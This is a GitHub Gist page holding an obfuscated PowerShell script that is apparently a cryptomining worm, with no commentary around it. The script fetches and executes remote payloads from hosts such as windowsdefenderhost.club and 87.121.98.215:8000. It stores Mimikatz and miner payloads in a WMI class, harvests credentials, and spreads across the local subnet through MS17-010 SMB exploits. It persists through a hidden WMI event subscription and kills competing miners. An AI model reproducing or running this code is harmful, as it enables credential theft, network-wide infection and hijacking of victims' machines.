Created
June 25, 2018 14:51
-
-
Save vexx32/678760fa2f2c10cc3571e85e74693417 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$se=@(('updat'+'e.w'+'ind'+'o'+'w'+'sdefe'+'nder'+'h'+'ost.club'),('i'+'nf'+'o.win'+'dows'+'de'+'f'+'enderhos'+'t.c'+'lub'),('8'+'7.'+'121.98.215')) | |
$nic=('www.w'+'ind'+'ow'+'sdefe'+'nderhost'+'.cl'+'ub') | |
foreach($t in $se) | |
{ | |
$pin=teSt-`Co`NNec`TIoN $t | |
if ($pin -ne $null) | |
{ | |
$nic=$t | |
break | |
} | |
} | |
$nic=$nic+(':80'+'00') | |
if ((GeT`-wmI`oBJEcT Win32_OperatingSystem).osarchitecture.contains('64')) | |
{ | |
I`Ex(n`Ew`-ObJEct Net.WebClient).DownloadString("http://$nic/info6.ps1") | |
return | |
} | |
function reload ($a){ | |
$b="" | |
$size=[Math]::Floor($a.length/1000) | |
for($i=$size-1;$i -ge 0;$i--) | |
{ | |
$b+=$a.Substring($i*1000,1000) | |
} | |
$b+=$a.Substring($size*1000) | |
return $b | |
} | |
$fa=r`elOAD $fa | |
$mimi = $fa.SubString(0, 944812) | |
$mon = $fa.SubString(944818, 570712) | |
$funs = $fa.SubString(1515531, 519596) | |
$sc = $fa.SubString(2035144, 3264) | |
try{ | |
$StaticClass = NEw-O`B`jECT Management.ManagementClass((('root'+'{0}def'+'aul'+'t') -f[CHAr]92), $null,$null) | |
$StaticClass.Name = ('co'+'red'+'pussvr') | |
$StaticClass.Put() | oUt`-NUll | |
$StaticClass.Properties.Add(('mi'+'mi') , $mimi) | |
$StaticClass.Put() | oU`T-nUll | |
$StaticClass.Properties.Add(('m'+'on') , $mon) | |
$StaticClass.Put() | out`-N`ULl | |
$StaticClass.Properties.Add(('fu'+'ns') , $funs) | |
$StaticClass.Put() | Out`-nu`LL | |
$StaticClass.Properties.Add('sc' , $sc) | |
$StaticClass.Put() | out`-NULL | |
$StaticClass.Properties.Add(('i'+'psu') ," ") | |
$StaticClass.Put() | OU`T-`NuLL | |
$StaticClass.Properties.Add(('i'+'17') ," ") | |
$StaticClass.Put() | O`UT-`NuLl | |
$StaticClass.Properties.Add(('v'+'er'), ('1'+'.4')) | |
$StaticClass.Put() | out`-NuLl | |
} catch { | |
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)) | |
I`Ex $defun | |
$Networks = GET-`Wm`iOb`Ject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled} | |
[byte[]]$sc=[System.Convert]::FromBase64String($sc) | |
foreach ($Network in $Networks) | |
{ | |
$IPAddress = $Network.IpAddress[0] | |
if ($IPAddress -match ('^1'+'69.254')){continue} | |
$SubnetMask = $Network.IPSubnet[0] | |
$ips=ge`T`-nETwoRKr`ANGe $IPAddress $SubnetMask | |
$tcpconn = N`E`TsTat -anop tcp | |
foreach ($t in $tcpconn) | |
{ | |
$line =$t.split(' ')| ?{$_} | |
if (!($line -is [array])){continue} | |
if ($line.count -le 4){continue} | |
$i=$line[-3].split(':')[0] | |
if ( ($line[-2] -eq ('ESTA'+'BL'+'ISHED')) -and ($i -ne ('1'+'2'+'7.0.0.1')) -and ($ips -notcontains $i)) | |
{ | |
$ips+=$i | |
} | |
} | |
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break} | |
foreach ($ip in $ips) | |
{ | |
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break} | |
if ($ip -eq $IPAddress){continue} | |
if ((TEST`-c`O`NNect`ioN $ip -count 1) -ne $null -and $ipsu -notcontains $ip) | |
{ | |
$vul=[PingCastle.Scanners.m17sc]::Scan($ip) | |
if ($vul -and $i17 -notcontains $ip) | |
{ | |
$res=E`B7 $ip $sc | |
if (!($res -eq $true)) | |
{e`B8 $ip $sc} | |
$i17 = $i17 + " "+$ip | |
} | |
} | |
} | |
} | |
} | |
$filterName = ('S'+'ystem Ev'+'ents '+'L'+'og F'+'ilter') | |
$consumerName = ('S'+'y'+'st'+'em Eve'+'nts Log '+'Consumer') | |
$Script=@' | |
$se=@('update.windowsdefenderhost.club','info.windowsdefenderhost.club','87.121.98.215') | |
$nic='www.windowsdefenderhost.club' | |
foreach($t in $se) | |
{ | |
$pin=test-connection $t | |
if ($pin -ne $null) | |
{ | |
$nic=$t | |
break | |
} | |
} | |
$nic=$nic+":8000" | |
$ver=(New-Object Net.WebClient).DownloadString("http://$nic/ver.txt").Trim() | |
if($ver -ne $null){ | |
if($ver -ne ([WmiClass] 'root\default:coredpussvr').Properties['ver'].Value){ | |
IEX (New-Object Net.WebClient).DownloadString("http://$nic/info3.ps1") | |
return | |
} | |
} | |
$stime=[Environment]::TickCount | |
$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value | |
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)) | |
iex $defun | |
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'System Events Log'} |Remove-WmiObject | |
[array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id} | |
$tcpconn = netstat -anop tcp | |
$exist=$False | |
if ($psids -ne $null ) | |
{ | |
foreach ($t in $tcpconn) | |
{ | |
$line =$t.split(' ')| ?{$_} | |
if ($line -eq $null) | |
{continue} | |
if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) ) | |
{ | |
$exist=$true | |
break | |
} | |
} | |
} | |
KillBot('coredpussvr') | |
foreach ($t in $tcpconn) | |
{ | |
$line =$t.split(' ')| ?{$_} | |
if (!($line -is [array])){continue} | |
if (($line[-3] -ne $null) -and $t.contains("ESTABLISHED") -and ($line[-3].contains(":1111") -or $line[-3].contains(":2222") -or $line[-3].contains(":3333") -or $line[-3].contains(":4444") -or $line[-3].contains(":5555") -or $line[-3].contains(":6666") -or $line[-3].contains(":7777") -or $line[-3].contains(":8888") -or $line[-3].contains(":9999") -or $line[-3].contains(":14433") -or $line[-3].contains(":45560") -or $line[-3].contains(":65333") -or $line[-3].contains(":55335"))) | |
{ | |
$evid=$line[-1] | |
Get-Process -id $evid | stop-process -force | |
} | |
} | |
if (!$exist -and ($psids.count -le 8)) | |
{ | |
$cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:coredpussvr').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`"" | |
$vbs = New-Object -ComObject WScript.Shell | |
$vbs.run($cmdmon,0) | |
} | |
$NTLM=$False | |
$mimi = ([WmiClass] 'root\default:coredpussvr').Properties['mimi'].Value | |
$a, $NTLM= Get-creds $mimi $mimi | |
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled} | |
$ipsu = ([WmiClass] 'root\default:coredpussvr').Properties['ipsu'].Value | |
$i17 = ([WmiClass] 'root\default:coredpussvr').Properties['i17'].Value | |
$scba= ([WmiClass] 'root\default:coredpussvr').Properties['sc'].Value | |
[byte[]]$sc=[System.Convert]::FromBase64String($scba) | |
foreach ($Network in $Networks) | |
{ | |
$IPAddress = $Network.IpAddress[0] | |
if ($IPAddress -match '^169.254'){continue} | |
$SubnetMask = $Network.IPSubnet[0] | |
$ips=Get-NetworkRange $IPAddress $SubnetMask | |
$tcpconn = netstat -anop tcp | |
foreach ($t in $tcpconn) | |
{ | |
$line =$t.split(' ')| ?{$_} | |
if (!($line -is [array])){continue} | |
if ($line.count -le 4){continue} | |
$i=$line[-3].split(':')[0] | |
if ( ($line[-2] -eq 'ESTABLISHED') -and ($i -ne '127.0.0.1') -and ($ips -notcontains $i)) | |
{ | |
$ips+=$i | |
} | |
} | |
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break} | |
foreach ($ip in $ips) | |
{ | |
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break} | |
if ($ip -eq $IPAddress){continue} | |
if ((Test-Connection $ip -count 1) -ne $null -and $ipsu -notcontains $ip) | |
{ | |
$re=0 | |
if ($a.count -ne 0) | |
{$re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM } | |
if ($re -eq 1){$ipsu =$ipsu +" "+$ip} | |
else | |
{ | |
$vul=[PingCastle.Scanners.m17sc]::Scan($ip) | |
if ($vul -and $i17 -notcontains $ip) | |
{ | |
$res=eb7 $ip $sc | |
if (!($res -eq $true)) | |
{eb8 $ip $sc} | |
$i17 = $i17 + " "+$ip | |
} | |
} | |
} | |
} | |
} | |
$StaticClass=New-Object Management.ManagementClass('root\default:coredpussvr') | |
$StaticClass.SetPropertyValue('ipsu' ,$ipsu) | |
$StaticClass.Put() | |
$StaticClass.SetPropertyValue('i17' ,$i17) | |
$StaticClass.Put() | |
'@ | |
$Scriptbytes = [System.Text.Encoding]::Unicode.GetBytes($Script) | |
$EncodedScript=[System.Convert]::ToBase64String($Scriptbytes) | |
$Query = (('SELECT * FROM __Insta'+'nceModif'+'icat'+'ionE'+'vent WITH'+'IN 56'+'00'+' WHERE'+' T'+'arge'+'tInstance I'+'S'+'A tMrWin32_Perf'+'F'+'o'+'rma'+'ttedDa'+'ta_Perf'+'OS_Syst'+'em'+'tMr') -REplACE 'tMr',[chAr]39) | |
gE`T-`w`MiObjecT -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter (('__P'+'a'+'t'+'h LI'+'KE '+'{0}%System Events'+' L'+'og Consu'+'mer%{0}') -f[ChAR]39) | reM`OVE`-w`mIoBjE`CT | |
Get`-wMiObje`cT -Namespace root\Subscription -Class __EventFilter -filter (('name= 9MQSy'+'ste'+'m '+'Even'+'ts'+' L'+'og F'+'ilter9'+'MQ')-cREplacE ([ChAR]57+[ChAR]77+[ChAR]81),[ChAR]39) |REMOV`E-w`m`IobjE`CT | |
GE`T-`wm`iO`BJeCt -Namespace root\Subscription -Class CommandLineEventConsumer -Filter (('Name'+'={0'+'}System Eve'+'nt'+'s Log Consumer'+'{0}') -F [char]39) | r`eMoVE-WMiOb`jECT | |
nE`Tsh ipsec static add policy name=netbc | |
N`eTSh ipsec static add filterlist name=block | |
ne`Tsh ipsec static add filteraction name=block action=block | |
n`eTsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445 | |
n`eTSh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block | |
Net`SH ipsec static set policy name=netbc assign=y | |
$FilterParams = @{ | |
Namespace = (('ro'+'ot5Gis'+'ubscr'+'ipti'+'on') -cREPlAce ([chAR]53+[chAR]71+[chAR]105),[chAR]92) | |
Class = ('__Ev'+'entF'+'ilter') | |
Arguments =@{Name=$filterName;EventNameSpace=(('r'+'oot{0}cimv2') -f[CHaR]92);QueryLanguage=('WQ'+'L');Query=$Query} | |
ErrorAction = ('Silently'+'Continu'+'e') | |
} | |
$WMIEventFilter = Set-`WmIINs`Ta`NcE @FilterParams | |
$ConsumerParams = @{ | |
Namespace = (('root{'+'0}'+'subscription')-f[ChaR]92) | |
Class = ('Comm'+'andLi'+'neEventConsu'+'m'+'er') | |
Arguments =@{ Name = $consumerName; CommandLineTemplate=('p'+'o'+'wershell.e'+'xe -NoP'+' -N'+'o'+'n'+'I'+' -W Hidde'+'n -E ')+"$EncodedScript"} | |
ErrorAction = ('S'+'ilentlyC'+'onti'+'nue') | |
} | |
$WMIEventConsumer = s`et-Wm`i`InsTANce @ConsumerParams | |
SeT`-WMI`In`ST`Ance -Class __FilterToConsumerBinding -Namespace (('root'+'RB2su'+'bscri'+'pti'+'on').REPLaCE('RB2',[STRinG][CHaR]92)) -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer} | OU`T`-NUll | |
Sc`hTaSKS /delete /tn yastcat /f | |
if (TEs`T-p`ATH ($env:SystemRoot+(('WXUt'+'empW'+'XUy1'+'.'+'b'+'at').rEpLace('WXU',[sTRiNG][cHaR]92)))){R`emO`V`e-ItEM -Path ($env:SystemRoot+(('T'+'Hl'+'tempTHly'+'1.bat').REpLacE('THl',[StrInG][chAr]92))) -Force} | |
po`w`ErCFG /CHANGE -standby-timeout-ac 0 | |
P`OwERCFG /CHANGE -hibernate-timeout-ac 0 | |
pO`we`RCfG -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 | |
[array]$psids= g`E`T-PROc`eSS -name powershell |sO`Rt cpu -Descending| FOreAC`H-`Obj`Ect {$_.id} | |
$tcpconn = NE`Tst`At -anop tcp | |
if ($psids -ne $null ) | |
{ | |
foreach ($t in $tcpconn) | |
{ | |
$line =$t.split(' ')| ?{$_} | |
if ($line -eq $null) | |
{continue} | |
if (($psids[0] -eq $line[-1]) -and $t.contains(('ES'+'T'+'ABLI'+'SHED')) -and ($t.contains((':8'+'0 ')) -or $t.contains((':'+'14444'))) ) | |
{ | |
geT`-p`ROcESs -id $psids[0] | stop-P`Roc`ESs -force | |
break | |
} | |
} | |
} | |
i`ex $script |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment